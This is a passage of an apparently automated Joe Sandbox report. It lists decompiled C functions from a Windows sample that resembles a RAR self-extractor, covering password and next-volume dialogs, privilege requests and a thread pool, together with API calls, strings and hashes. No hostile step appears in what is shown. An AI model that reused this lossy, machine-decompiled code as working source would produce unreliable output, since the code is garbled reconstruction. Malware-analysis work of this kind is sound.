						_t112 = _v36;
						_t131 = _t130 + 0x18;
						_t87 = _v40;
						_v16 = _t87;
						_v8 = _t112;
						if(_t112 < _v28) {
							_t102 = _t112 * 0x14;
							_v12 = _t102;
							do {
								_t103 = 5;
								_t90 = memcpy( &_v60,  *((intOrPtr*)( *_t87 + 0x10)) + _t102, _t103 << 2);
								_t131 = _t131 + 0xc;
								if(_v60 <= _t90 && _t90 <= _v56) {
									_t93 = _v44 + 0xfffffff0 + (_v48 << 4);
									_t108 = _t93[4];
									if(_t108 == 0 ||  *((char*)(_t108 + 8)) == 0) {
										if(( *_t93 & 0x00000040) == 0) {
											_push(0);
											_push(1);
											E00B82DB1(_t112, _t96, _a8, _a12, _a16, _a20, _t93, 0,  &_v60, _a28, _a32);
											_t112 = _v8;
											_t131 = _t131 + 0x30;
										}
									}
								}
								_t112 = _t112 + 1;
								_t87 = _v16;
								_t102 = _v12 + 0x14;
								_v8 = _t112;
								_v12 = _t102;
							} while (_t112 < _v28);
						}
						goto L16;
					}
					E00B88D24(_t96, _t110, 0, _t121);
					asm("int3");
					_t111 = _v68;
					_push(_t96);
					_push(_t121);
					_push(0);
					_t78 = _t111[4];
					__eflags = _t78;
					if(_t78 == 0) {
						L41:
						_t80 = 1;
						__eflags = 1;
					} else {
						_t101 = _t78 + 8;
						__eflags =  *_t101;
						if( *_t101 == 0) {
							goto L41;
						} else {
							__eflags =  *_t111 & 0x00000080;
							_t116 = _a4;
							if(( *_t111 & 0x00000080) == 0) {
								L23:
								_t97 = _t116[4];
								_t123 = 0;
								__eflags = _t78 - _t97;
								if(_t78 == _t97) {
									L33:
									__eflags =  *_t116 & 0x00000002;
									if(( *_t116 & 0x00000002) == 0) {
										L35:
										_t81 = _a8;
										__eflags =  *_t81 & 0x00000001;
										if(( *_t81 & 0x00000001) == 0) {
											L37:
											__eflags =  *_t81 & 0x00000002;
											if(( *_t81 & 0x00000002) == 0) {
												L39:
												_t123 = 1;
												__eflags = 1;
											} else {
												__eflags =  *_t111 & 0x00000002;
												if(( *_t111 & 0x00000002) != 0) {
													goto L39;
												}
											}
										} else {
											__eflags =  *_t111 & 0x00000001;
											if(( *_t111 & 0x00000001) != 0) {
												goto L37;
											}
										}
									} else {
										__eflags =  *_t111 & 0x00000008;
										if(( *_t111 & 0x00000008) != 0) {
											goto L35;
										}
									}
									_t80 = _t123;
								} else {
									_t59 = _t97 + 8; // 0x6e
									_t82 = _t59;
									while(1) {
										_t98 =  *_t101;
										__eflags = _t98 -  *_t82;
										if(_t98 !=  *_t82) {
											break;
										}
										__eflags = _t98;
										if(_t98 == 0) {
											L29:
											_t83 = _t123;
										} else {
											_t99 =  *((intOrPtr*)(_t101 + 1));
											__eflags = _t99 -  *((intOrPtr*)(_t82 + 1));
											if(_t99 !=  *((intOrPtr*)(_t82 + 1))) {
												break;
											} else {
												_t101 = _t101 + 2;
												_t82 = _t82 + 2;
												__eflags = _t99;
												if(_t99 != 0) {
													continue;
												} else {
													goto L29;
												}
											}
										}
										L31:
										__eflags = _t83;
										if(_t83 == 0) {
											goto L33;
										} else {
											_t80 = 0;
										}
										goto L42;
									}
									asm("sbb eax, eax");
									_t83 = _t82 | 0x00000001;
									__eflags = _t83;
									goto L31;
								}
							} else {
								__eflags =  *_t116 & 0x00000010;
								if(( *_t116 & 0x00000010) != 0) {
									goto L41;
								} else {
									goto L23;
								}
							}
						}
					}
					L42:
					return _t80;
				}
			}

0x00b831d6
0x00b831d6
0x00b831dd
0x00b831e0
0x00b831e6
0x00b83305
0x00b831ec
0x00b831ec
0x00b831ed
0x00b831ee
0x00b831f5
0x00b831f8
0x00b831fb
0x00b83201
0x00b8320b
0x00b83230
0x00b83235
0x00b8323a
0x00b83301
0x00000000
0x00b83302
0x00b8323a
0x00b8320b
0x00b83240
0x00b83243
0x00b83246
0x00b8324c
0x00b83252
0x00b83264
0x00b83269
0x00b8326c
0x00b8326f
0x00b83272
0x00b83275
0x00b8327b
0x00b83281
0x00b83284
0x00b83287
0x00b83296
0x00b83297
0x00b83297
0x00b8329c
0x00b832af
0x00b832b1
0x00b832b6
0x00b832c1
0x00b832c3
0x00b832c5
0x00b832e1
0x00b832e6
0x00b832e9
0x00b832e9
0x00b832c1
0x00b832b6
0x00b832ef
0x00b832f0
0x00b832f3
0x00b832f6
0x00b832f9
0x00b832fc
0x00b83287
0x00000000
0x00b8327b
0x00b83306
0x00b8330b
0x00b8330f
0x00b83312
0x00b83313
0x00b83314
0x00b83315
0x00b83318
0x00b8331a
0x00b83392
0x00b83394
0x00b83394
0x00b8331c
0x00b8331c
0x00b8331f
0x00b83322
0x00000000
0x00b83324
0x00b83324
0x00b83327
0x00b8332a
0x00b83331
0x00b83331
0x00b83334
0x00b83336
0x00b83338
0x00b8336a
0x00b8336a
0x00b8336d
0x00b83374
0x00b83374
0x00b83377
0x00b8337a
0x00b83381
0x00b83381
0x00b83384
0x00b8338b
0x00b8338d
0x00b8338d
0x00b83386
0x00b83386
0x00b83389
0x00000000
0x00000000
0x00b83389
0x00b8337c
0x00b8337c
0x00b8337f
0x00000000
0x00000000
0x00b8337f
0x00b8336f
0x00b8336f
0x00b83372
0x00000000
0x00000000
0x00b83372
0x00b8338e
0x00b8333a
0x00b8333a
0x00b8333a
0x00b8333d
0x00b8333d
0x00b8333f
0x00b83341
0x00000000
0x00000000
0x00b83343
0x00b83345
0x00b83359
0x00b83359
0x00b83347
0x00b83347
0x00b8334a
0x00b8334d
0x00000000
0x00b8334f
0x00b8334f
0x00b83352
0x00b83355
0x00b83357
0x00000000
0x00000000
0x00000000
0x00000000
0x00b83357
0x00b8334d
0x00b83362
0x00b83362
0x00b83364
0x00000000
0x00b83366
0x00b83366
0x00b83366
0x00000000
0x00b83364
0x00b8335d
0x00b8335f
0x00b8335f
0x00000000
0x00b8335f
0x00b8332c
0x00b8332c
0x00b8332f
0x00000000
0x00000000
0x00000000
0x00000000
0x00b8332f
0x00b8332a
0x00b83322
0x00b83395
0x00b83399
0x00b83399

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00B831FB
_abort.LIBCMT ref: 00B83306

Strings

RCC, xrefs: 00B83215
MOC, xrefs: 00B8320D

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: EncodePointer_abort
String ID: MOC$RCC
API String ID: 948111806-2084237596
Opcode ID: 72e68c2bb73565238127102c69ee702cfad5a456735c5132f5ab5756246f2858
Instruction ID: ab106154ac52502b0b01987e9fb27d4df01a51376953ef440b4ccd1c3b075bb1
Opcode Fuzzy Hash: 72e68c2bb73565238127102c69ee702cfad5a456735c5132f5ab5756246f2858
Instruction Fuzzy Hash: 76414971900209AFCF15EF98CD81AAEBBF5FF48B04F148099F90467222D735AA50DB54

Uniqueness

Uniqueness Score: -1.00%

Function 00B67401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E00B67401(void* __ebx, void* __edi, void* __esi) {
				intOrPtr _t31;
				long _t38;
				void* _t45;
				void* _t48;
				intOrPtr _t49;
				void* _t62;
				void* _t63;
				void* _t66;

				_t62 = __esi;
				_t48 = __ebx;
				E00B7EB78(0xb927b7, _t66);
				E00B7EC50(0x1060);
				 *((intOrPtr*)(_t66 - 0x20)) = 0;
				 *((intOrPtr*)(_t66 - 0x1c)) = 0;
				 *((intOrPtr*)(_t66 - 0x18)) = 0;
				 *((intOrPtr*)(_t66 - 0x14)) = 0;
				 *((char*)(_t66 - 0x10)) = 0;
				_t59 =  *((intOrPtr*)(_t66 + 8));
				_push(0);
				_push(0);
				 *((intOrPtr*)(_t66 - 4)) = 0;
				_push(_t66 - 0x20);
				if(E00B63BBA( *((intOrPtr*)(_t66 + 8))) != 0) {
					if( *0xba1022 == 0) {
						if(E00B67A9C(L"SeSecurityPrivilege") != 0) {
							 *0xba1021 = 1;
						}
						E00B67A9C(L"SeRestorePrivilege");
						 *0xba1022 = 1;
					}
					_push(_t62);
					_t63 = 7;
					if( *0xba1021 != 0) {
						_t63 = 0xf;
					}
					_push(_t48);
					_t49 =  *((intOrPtr*)(_t66 - 0x20));
					_push(_t49);
					_push(_t63);
					_push( *((intOrPtr*)(_t66 + 0xc)));
					if( *0xbc3000() == 0) {
						if(E00B6BB03( *((intOrPtr*)(_t66 + 0xc)), _t66 - 0x106c, 0x800) == 0) {
							L10:
							E00B62021(_t75, 0x52, _t59 + 0x32,  *((intOrPtr*)(_t66 + 0xc)));
							_t38 = GetLastError();
							E00B66DCB(0xba1098, _t75);
							if(_t38 == 5 && E00B707BC() == 0) {
								E00B615C6(_t66 - 0x6c, 0x18);
								E00B715FE(_t66 - 0x6c);
							}
							E00B66D83(0xba1098, 1);
						} else {
							_t45 =  *0xbc3000(_t66 - 0x106c, _t63, _t49);
							_t75 = _t45;
							if(_t45 == 0) {
								goto L10;
							}
						}
					}
				}
				_t31 =  *((intOrPtr*)(_t66 - 0x20));
				 *((intOrPtr*)(_t66 - 4)) = 2;
				if(_t31 != 0) {
					if( *((char*)(_t66 - 0x10)) != 0) {
						E00B6F445(_t31,  *((intOrPtr*)(_t66 - 0x18)));
						_t31 =  *((intOrPtr*)(_t66 - 0x20));
					}
					_t31 = L00B83E2E(_t31);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t66 - 0xc));
				return _t31;
			}

0x00b67401
0x00b67401
0x00b67406
0x00b67410
0x00b67418
0x00b6741b
0x00b6741e
0x00b67421
0x00b67424
0x00b67427
0x00b6742c
0x00b6742d
0x00b6742e
0x00b67434
0x00b6743c
0x00b67449
0x00b67457
0x00b67459
0x00b67459
0x00b67465
0x00b6746a
0x00b6746a
0x00b67478
0x00b6747b
0x00b6747c
0x00b67480
0x00b67480
0x00b67481
0x00b67482
0x00b67485
0x00b67486
0x00b67487
0x00b67492
0x00b674aa
0x00b674bf
0x00b674c8
0x00b674cd
0x00b674dc
0x00b674e4
0x00b674f4
0x00b674fc
0x00b674fc
0x00b67505
0x00b674ac
0x00b674b5
0x00b674bb
0x00b674bd
0x00000000
0x00000000
0x00b674bd
0x00b674aa
0x00b6750b
0x00b6750c
0x00b6750f
0x00b67519
0x00b6751f
0x00b67525
0x00b6752a
0x00b6752a
0x00b6752e
0x00b67533
0x00b67537
0x00b6753f

APIs

__EH_prolog.LIBCMT ref: 00B67406

Part of subcall function 00B63BBA: __EH_prolog.LIBCMT ref: 00B63BBF

GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000,00000000), ref: 00B674CD

Part of subcall function 00B67A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00B67AAB
Part of subcall function 00B67A9C: GetLastError.KERNEL32 ref: 00B67AF1
Part of subcall function 00B67A9C: CloseHandle.KERNEL32(?), ref: 00B67B00

Strings

SeSecurityPrivilege, xrefs: 00B6744B
SeRestorePrivilege, xrefs: 00B67460

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: ErrorH_prologLast$CloseCurrentHandleProcess
String ID: SeRestorePrivilege$SeSecurityPrivilege
API String ID: 3813983858-639343689
Opcode ID: abfe27e350b7676890ceedddbb3b164de6906b6360d209d6eca06d92ec7d9044
Instruction ID: 79fbabde2d9c9baa31ddcc4b141781c0b579639be0250962d8f4732902bbf29e
Opcode Fuzzy Hash: abfe27e350b7676890ceedddbb3b164de6906b6360d209d6eca06d92ec7d9044
Instruction Fuzzy Hash: 5831A171D44258AADF21EBA89C45FEE7BE8EF19708F0440D5F505A7292DF788A44CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B7AAC9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00B7AAD2
GetObjectW.GDI32(?,00000018,?,?,?,?,?,?,?,?,?,00B7A829,?,?,?), ref: 00B7AB01
ReleaseDC.USER32(00000000,?), ref: 00B7AB99

Strings

v, xrefs: 00B7AB99

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: ObjectRelease
String ID: v
API String ID: 1429681911-1801730948
Opcode ID: d96f18dfc3a404337e0b1da76b8d9f0d56130f44d9061ef75475b1b1adc96406
Instruction ID: 234113e23d00f0c0f8ff801e152d549b713cbefc8ca47dc64545fd3efe4e2bd1
Opcode Fuzzy Hash: d96f18dfc3a404337e0b1da76b8d9f0d56130f44d9061ef75475b1b1adc96406
Instruction Fuzzy Hash: CB21E972108304AFD3019FA5DC48E6FBFF9FB8DB51F444819FA4693220DA319A548B62

Uniqueness

Uniqueness Score: -1.00%

Function 00B7AD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00B7AD10(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR** _a16) {
				void* _t12;
				void* _t16;
				void* _t19;
				void* _t22;
				WCHAR** _t24;
				intOrPtr _t27;
				void* _t28;
				struct HWND__* _t30;
				signed short _t31;

				_t24 = _a16;
				_t31 = _a12;
				_t30 = _a4;
				_t27 = _a8;
				if(E00B61316(__edx, _t30, _t27, _t31, _t24, L"ASKNEXTVOL", 0, 0) != 0) {
					L14:
					__eflags = 1;
					return 1;
				}
				_t28 = _t27 - 0x110;
				if(_t28 == 0) {
					_push( *_t24);
					 *0xbc1cb8 = _t24;
					L13:
					SetDlgItemTextW(_t30, 0x66, ??);
					goto L14;
				}
				if(_t28 != 1) {
					L6:
					return 0;
				}
				_t12 = (_t31 & 0x0000ffff) - 1;
				if(_t12 == 0) {
					GetDlgItemTextW(_t30, 0x66,  *( *0xbc1cb8), ( *0xbc1cb8)[1]);
					_push(1);
					L10:
					EndDialog(_t30, ??);
					goto L14;
				}
				_t16 = _t12 - 1;
				if(_t16 == 0) {
					_push(0);
					goto L10;
				}
				if(_t16 == 0x65) {
					_t19 = E00B6C29A(__eflags,  *( *0xbc1cb8));
					_t22 = E00B61100(_t30, E00B6E617(0x8e),  *( *0xbc1cb8), _t19, 0);
					__eflags = _t22;
					if(_t22 == 0) {
						goto L14;
					}
					_push( *( *0xbc1cb8));
					goto L13;
				}
				goto L6;
			}

0x00b7ad11
0x00b7ad16
0x00b7ad1b
0x00b7ad20
0x00b7ad38
0x00b7adc8
0x00b7adca
0x00000000
0x00b7adca
0x00b7ad3e
0x00b7ad44
0x00b7adb7
0x00b7adb9
0x00b7adbf
0x00b7adc2
0x00000000
0x00b7adc2
0x00b7ad49
0x00b7ad5d
0x00000000
0x00b7ad5d
0x00b7ad4e
0x00b7ad51
0x00b7adad
0x00b7adb3
0x00b7ad97
0x00b7ad98
0x00000000
0x00b7ad98
0x00b7ad53
0x00b7ad56
0x00b7ad95
0x00000000
0x00b7ad95
0x00b7ad5b
0x00b7ad6a
0x00b7ad83
0x00b7ad88
0x00b7ad8a
0x00000000
0x00000000
0x00b7ad91
0x00000000
0x00b7ad91
0x00000000

APIs

Part of subcall function 00B61316: GetDlgItem.USER32(00000000,00003021), ref: 00B6135A
Part of subcall function 00B61316: SetWindowTextW.USER32(00000000,00B935F4), ref: 00B61370

EndDialog.USER32(?,00000001), ref: 00B7AD98
GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00B7ADAD
SetDlgItemTextW.USER32(?,00000066,?), ref: 00B7ADC2

Strings

ASKNEXTVOL, xrefs: 00B7AD28

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: ASKNEXTVOL
API String ID: 445417207-3402441367
Opcode ID: 513bc4c1dd62c00f4f97fba2d93678eab51459071c6bbf6cbc50641b5bd36115
Instruction ID: b106da7efa5a0a548bc4f28207494200686c90a9001b69e29691cf18d8eee8da
Opcode Fuzzy Hash: 513bc4c1dd62c00f4f97fba2d93678eab51459071c6bbf6cbc50641b5bd36115
Instruction Fuzzy Hash: 6B11D632240200BFD7619F6CDC85FAE37E9EB8B742F4084A0F255EB4E1CB6199559726

Uniqueness

Uniqueness Score: -1.00%

Function 00B6D8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E00B6D8EC(void* __ebx, void* __ecx, void* __edx) {
				void* __esi;
				void* _t22;
				intOrPtr _t26;
				signed int* _t30;
				void* _t33;
				void* _t41;
				void* _t43;
				void* _t45;
				void* _t47;
				void* _t49;
				void* _t50;

				_t43 = __edx;
				_t42 = __ecx;
				_t41 = __ebx;
				_t47 = _t49 - 0x64;
				_t50 = _t49 - 0xac;
				_t45 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x2c)) <= 0) {
					L12:
					_t22 = 0;
				} else {
					 *((intOrPtr*)(_t47 + 0x5c)) =  *((intOrPtr*)(_t47 + 0x6c));
					 *((char*)(_t47 + 8)) = 0;
					 *((intOrPtr*)(_t47 + 0x60)) = _t47 + 8;
					if( *((intOrPtr*)(_t47 + 0x74)) != 0) {
						E00B71DA7( *((intOrPtr*)(_t47 + 0x74)), _t47 - 0x48, 0x50);
					}
					_t26 =  *((intOrPtr*)(_t47 + 0x70));
					if(_t26 == 0) {
						E00B705A7(_t47 + 8, "s", 0x50);
					} else {
						_t33 = _t26 - 1;
						if(_t33 == 0) {
							_push(_t47 - 0x48);
							_push("$%s");
							goto L8;
						} else {
							if(_t33 == 1) {
								_push(_t47 - 0x48);
								_push("@%s");
								L8:
								_push(0x50);
								_push(_t47 + 8);
								E00B6E5B1();
								_t50 = _t50 + 0x10;
							}
						}
					}
					_t30 = E00B86159(_t41, _t42, _t43, _t45, _t47 + 0x58,  *((intOrPtr*)(_t45 + 0x14)),  *((intOrPtr*)(_t45 + 0x18)), 4, E00B6D710);
					if(_t30 == 0) {
						goto L12;
					} else {
						_t20 = 0xb9e278 +  *_t30 * 0xc; // 0xb94788
						E00B867C0( *((intOrPtr*)(_t47 + 0x78)),  *_t20,  *((intOrPtr*)(_t47 + 0x7c)));
						_t22 = 1;
					}
				}
				return _t22;
			}

0x00b6d8ec
0x00b6d8ec
0x00b6d8ec
0x00b6d8ed
0x00b6d8f1
0x00b6d8f8
0x00b6d8fe
0x00b6d9a6
0x00b6d9a6
0x00b6d904
0x00b6d90b
0x00b6d911
0x00b6d915
0x00b6d918
0x00b6d923
0x00b6d923
0x00b6d92b
0x00b6d92e
0x00b6d969
0x00b6d930
0x00b6d930
0x00b6d933
0x00b6d948
0x00b6d949
0x00000000
0x00b6d935
0x00b6d938
0x00b6d93d
0x00b6d93e
0x00b6d94e
0x00b6d951
0x00b6d953
0x00b6d954
0x00b6d959
0x00b6d959
0x00b6d938
0x00b6d933
0x00b6d97f
0x00b6d989
0x00000000
0x00b6d98b
0x00b6d991
0x00b6d99a
0x00b6d9a2
0x00b6d9a2
0x00b6d989
0x00b6d9ad

APIs

__fprintf_l.LIBCMT ref: 00B6D954
_strncpy.LIBCMT ref: 00B6D99A

Part of subcall function 00B71DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00BA1030,?,00B6D928,00000000,?,00000050,00BA1030), ref: 00B71DC4

Strings

$%s, xrefs: 00B6D949
@%s, xrefs: 00B6D93E

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: ByteCharMultiWide__fprintf_l_strncpy
String ID: $%s$@%s
API String ID: 562999700-834177443
Opcode ID: 0f788e027f59c1241c388c3ccec603132e15a6d5ce2600fbfc7d7d9411aa1b8e
Instruction ID: 34bd271cc3a292324d34598e5cd4515b9416c2e909757b0350f75ab3a5fbc34e
Opcode Fuzzy Hash: 0f788e027f59c1241c388c3ccec603132e15a6d5ce2600fbfc7d7d9411aa1b8e
Instruction Fuzzy Hash: 90216372940248AADF21EFA4CC45FEE7BE8EF05704F0445A2F914961E2E375DA58CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00B70E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E00B70E46(long* __ecx, long _a4) {
				void* __esi;
				void* __ebp;
				long _t11;
				void* _t14;
				long _t23;
				long* _t25;

				_t19 = __ecx;
				_t11 = _a4;
				_t25 = __ecx;
				_t23 = 0x40;
				 *__ecx = _t11;
				if(_t11 <= _t23) {
					if(_t11 == 0) {
						 *__ecx = 1;
						_t11 = 1;
					}
				} else {
					 *__ecx = _t23;
					_t11 = _t23;
				}
				_t25[0x41] = 0;
				if(_t11 > _t23) {
					 *_t25 = _t23;
				}
				_t3 =  &(_t25[0xc8]); // 0x320
				_t25[0xc5] = 0;
				InitializeCriticalSection(_t3);
				_t25[0xc6] = CreateSemaphoreW(0, 0, _t23, 0);
				_t14 = CreateEventW(0, 1, 1, 0);
				_t25[0xc7] = _t14;
				if(_t25[0xc6] == 0 || _t14 == 0) {
					_push(L"\nThread pool initialization failed.");
					_push(0xba1098);
					E00B66C31(E00B66C36(_t19), 0xba1098, _t25, 2);
				}
				_t25[0xc3] = 0;
				_t25[0xc4] = 0;
				_t25[0x42] = 0;
				return _t25;
			}

0x00b70e46
0x00b70e46
0x00b70e4e
0x00b70e54
0x00b70e56
0x00b70e5a
0x00b70e64
0x00b70e66
0x00b70e68
0x00b70e68
0x00b70e5c
0x00b70e5c
0x00b70e5e
0x00b70e5e
0x00b70e6c
0x00b70e74
0x00b70e76
0x00b70e76
0x00b70e78
0x00b70e7e
0x00b70e85
0x00b70e99
0x00b70e9f
0x00b70ea5
0x00b70eb1
0x00b70eb7
0x00b70ec1
0x00b70ecd
0x00b70ecd
0x00b70ed3
0x00b70edb
0x00b70ee1
0x00b70eea

APIs

InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00B6AC5A,00000008,?,00000000,?,00B6D22D,?,00000000), ref: 00B70E85
CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00B6AC5A,00000008,?,00000000,?,00B6D22D,?,00000000), ref: 00B70E8F
CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00B6AC5A,00000008,?,00000000,?,00B6D22D,?,00000000), ref: 00B70E9F

Strings

Thread pool initialization failed., xrefs: 00B70EB7

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: 0fc6655840fad2ba0c122f957a0fe4c8f7a82228ae7b7ae4627b886a2d4334b5
Instruction ID: 17a8075c7fa5a053a1e9a10540ed0e438a96826e7435f90c8828b7aa2827d7bf
Opcode Fuzzy Hash: 0fc6655840fad2ba0c122f957a0fe4c8f7a82228ae7b7ae4627b886a2d4334b5
Instruction Fuzzy Hash: B4114FB1A44708DBC3215F6ADD84AA7FBECEB55744F14886FE1DA83200DA7159418B54

Uniqueness

Uniqueness Score: -1.00%

Function 00B7B270 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00B7B270(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR* _a16) {
				short _v260;
				void* __ebx;
				void* _t15;
				signed short _t24;
				struct HWND__* _t28;
				intOrPtr _t29;
				void* _t30;

				_t24 = _a12;
				_t29 = _a8;
				_t28 = _a4;
				if(E00B61316(__edx, _t28, _t29, _t24, _a16, L"GETPASSWORD1", 0, 0) != 0) {
					L10:
					return 1;
				}
				_t30 = _t29 - 0x110;
				if(_t30 == 0) {
					SetDlgItemTextW(_t28, 0x67, _a16);
					goto L10;
				}
				if(_t30 != 1) {
					L5:
					return 0;
				}
				_t15 = (_t24 & 0x0000ffff) - 1;
				if(_t15 == 0) {
					GetDlgItemTextW(_t28, 0x66,  &_v260, 0x80);
					E00B6F3FA(_t24, 0xbb7a78,  &_v260);
					E00B6F445( &_v260, 0x80);
					_push(1);
					L7:
					EndDialog(_t28, ??);
					goto L10;
				}
				if(_t15 == 1) {
					_push(0);
					goto L7;
				}
				goto L5;
			}

0x00b7b27a
0x00b7b27e
0x00b7b282
0x00b7b29b
0x00b7b30a
0x00000000
0x00b7b30c
0x00b7b29d
0x00b7b2a3
0x00b7b304
0x00000000
0x00b7b304
0x00b7b2a8
0x00b7b2b7
0x00000000
0x00b7b2b7
0x00b7b2ad
0x00b7b2b0
0x00b7b2d6
0x00b7b2e8
0x00b7b2f5
0x00b7b2fa
0x00b7b2bd
0x00b7b2be
0x00000000
0x00b7b2be
0x00b7b2b5
0x00b7b2bb
0x00000000
0x00b7b2bb
0x00000000

APIs

Part of subcall function 00B61316: GetDlgItem.USER32(00000000,00003021), ref: 00B6135A
Part of subcall function 00B61316: SetWindowTextW.USER32(00000000,00B935F4), ref: 00B61370

EndDialog.USER32(?,00000001), ref: 00B7B2BE
GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00B7B2D6
SetDlgItemTextW.USER32(?,00000067,?), ref: 00B7B304

Strings

GETPASSWORD1, xrefs: 00B7B289

